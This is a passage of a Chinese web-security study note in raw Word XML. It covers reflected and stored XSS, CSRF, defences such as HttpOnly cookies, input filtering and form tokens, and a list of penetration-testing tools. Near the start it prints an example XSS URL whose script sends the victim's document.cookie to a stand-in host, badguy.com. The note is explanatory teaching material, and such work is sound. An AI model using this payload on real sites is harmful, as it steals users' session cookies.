          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>然后Tom 构造一个恶意的url(如下), 通过某种方式(邮件，QQ)发给Monica</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://victim.com/search.asp?term=&lt;script&gt;window.open("http://badguy.com?cookie="+document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Monica点击了这个URL，嵌入在URL中的恶意Javascript代码就会在Monica的浏览器中执行. 那么Monica在victim.com网站的cookie, 就会被发送到badguy网站中。这样Monica在victim.com 的信息就被Tom盗了.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>s:上面URL的意思是打开victim.com页面，并将该网站的Cookie作为参数传给badguy.com网站。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>Stored XSS(存储式XSS漏洞)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">该类型是应用广泛而且有可能影响大Web服务器自身安全的漏洞，攻击者将攻击脚本上传到Web服务器上，使得所有访问该页面的用户都面临信息泄露的可能。 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>攻击过程如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Alex发现了网站A上有一个XSS 漏洞，该漏洞允许将攻击代码保存在数据库中，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Alex发布了一篇文章，文章中嵌入了恶意JavaScript代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>其他人如Monica访问这片文章的时候，嵌入在文章中的恶意Javascript代码就会在Monica的浏览器中执行，其会话cookie或者其他信息将被Alex盗走。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>Dom-Based XSS漏洞威胁用户个体，而存储式XSS漏洞所威胁的对象将是大量的用户.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>XSS漏洞修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>将重要的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>ookie标记为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>,这样的话Javascript 中的document.cookie语句就不能获取到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>ookie了.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>（HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一旦被设置，在浏览器的document对象中就看不到Cookie了。而浏览器在浏览网页的时候不受任何影响，因为Cookie会被放在浏览器头中发送出去</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>只允许用户输入我们期望的数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>例如：年龄的textbox中，只允许用户输入数字。而数字之外的字符都过滤掉。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>对数据进行Html Encode处理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>过滤或移除特殊的Html标签， 例如: &lt;script&gt;, &lt;iframe&gt; , &amp;lt; for &lt;, &amp;gt; for &gt;, &amp;quot for</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>过滤JavaScript事件的标签。例如"onclick=", "onfocus"等等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ASP.NET中有防范XSS的机制，对提交的表单会自动检查是否存在XSS，当用户试图输入XSS代码的时候，ASP.NET会抛出一个错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>web安全之XSS注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://blog.csdn.net/zzzmmmkkk/article/details/10862949" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用HttpOnly提升Cookie安全性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CSRF注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CSRF（Cross-site request forgery），中文名称：跨站请求伪造，也被称为：one click attack/session riding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>你这可以这么理解CSRF攻击：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>攻击者盗用了你的身份，以你的名义发送恶意请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。CSRF能够做的事情包括：以你名义发送邮件，发消息，盗取你的账号，甚至于购买商品，虚拟货币转账......造成的问题包括：个人隐私泄露以及财产安全。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Georgia" w:hAnsi="Georgia"/>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2009040916453171.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="3746500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CSRF攻击是源于WEB的隐式身份验证机制！WEB的身份验证机制虽然可以保证一个请求是来自于某个用户的浏览器，但却无法保证该请求是用户批准发送的！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CSRF的防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务端的CSRF方式方法很多样，但总的思想都是一致的，就是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>客户端页面增加伪随机数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1. 首先在后台设置一个Cookie的随机数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2. 在表单中添加一个控件，存放该随机数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3. 在表单提交的后台验证该随机数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>渗透注入检测工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DirBuster目录渗透工具，专门用于探测Web服务器的目录和隐藏文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Nmap网络连接端软件，网络连接端扫描软件，用来扫描网上电脑开放的网络连接端</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Pangolin Sql注入工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AppScan业界领先的web应用安全监测工具（软件界面可以选择中文，不过是收费的）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>欺骗</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ClickJacking（点击劫持）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>透明iframe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HTTP头——X-Frame-Options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>图片掩盖接口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>暴力破解</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:ind w:left="450"/>
